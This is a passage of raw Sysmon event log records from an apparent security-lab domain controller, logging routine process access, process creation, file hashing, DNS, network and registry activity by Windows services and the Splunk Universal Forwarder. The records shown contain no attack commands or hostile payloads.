Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6ECF-603E-19AB-00000000AD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.640{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ECF-603E-19AB-00000000AD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.642{05ADC7E1-6ECF-603E-19AB-00000000AD01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002247133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.499{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDBD42C8AC1AF4F1C37C87C6B97FAE6C,SHA256=12A6D19EE6397DC2FDC7D02BA46131A94752B2F6E36938C28706F4A12F055BDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.390{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56612C37E30D94ACA44B9687F9045251,SHA256=63C75E9EBAADD2A31C515B720B71B9D1CFF342BE95A55D84238534BDDC4E9DCB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:44.608{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58346- 10341000x80000000000000002247130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ECF-603E-18AB-00000000AD01}15092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6ECF-603E-18AB-00000000AD01}15092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.093{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ECF-603E-18AB-00000000AD01}15092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.094{05ADC7E1-6ECF-603E-18AB-00000000AD01}15092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002247145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:56.660{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31FED13BE0B1B1D2D8D9B902683D6330,SHA256=66BDD5C09F689A95F54D4B811809C5EEE0E253869A07094E9CF18F129F2E60EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:56.390{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21797817F812ED948AE20D198E08A53C,SHA256=F3A7DB4C8E6BA6218772057A88CB3D276994577381BE065DE201A038C93193CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:45.623{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58346- 13241300x80000000000000002247156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002247155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x14b1aa35) 13241300x80000000000000002247154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d70f7c-0xf4140f09) 13241300x80000000000000002247153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d70f85-0x55d87709) 13241300x80000000000000002247152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d70f8d-0xb79cdf09) 13241300x80000000000000002247151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002247150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x14b1aa35) 13241300x80000000000000002247149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d70f7c-0xf4140f09) 13241300x80000000000000002247148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d70f85-0x55d87709) 13241300x80000000000000002247147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:58:57.859{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d70f8d-0xb79cdf09) 23542300x80000000000000002247146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:57.421{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32DFACEACB214291B19C5FD9600EEA32,SHA256=0BC16DE15EAE61C6FE70214D62F21D168ABDC3DDDA10F75F1BA1B12E5C1C5EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:58.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB732025F78D90F8F794C702F6645AE2,SHA256=29ED69880BDB03A14874A70F6529CF76B5351C65D349867BD858D6F72B5F9BD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:58.459{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A70878BDAB1457CB5FF2E2CFEACB7A4,SHA256=427B1E0BE77E860D43C6FC86EC2B981E60D22BC38C88563286F6ACD20B48584D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:59.468{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68334AEE7F4FB64D1D00D2EF526ACC32,SHA256=6FD0566EF23D3E3D99257575A6D7F276F1D4C931AABA53DFA42B24D34BED2D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:00.484{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC89123FBC5AAE0AA7F343E56BD645D,SHA256=5A986BF13034A70547439D0917F9C7D152E1123BDD14CFEE66B04687897F0612,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:49.265{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60234-false10.0.1.12-8000- 23542300x80000000000000002247160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:00.249{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4A9ED5548EE4051225F77DC5E5587A4,SHA256=393BE801A14F732C6E5833CF3CAE841EC365FF6E25AAC936D965334E0A145299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:01.515{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B6FAE24FE2D0A61B8E503D0B88711B,SHA256=3A6E88A43D8AF712C2ED8188B2401D9735779B6B01173E81102238B59A402DFC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ED6-603E-1AAB-00000000AD01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 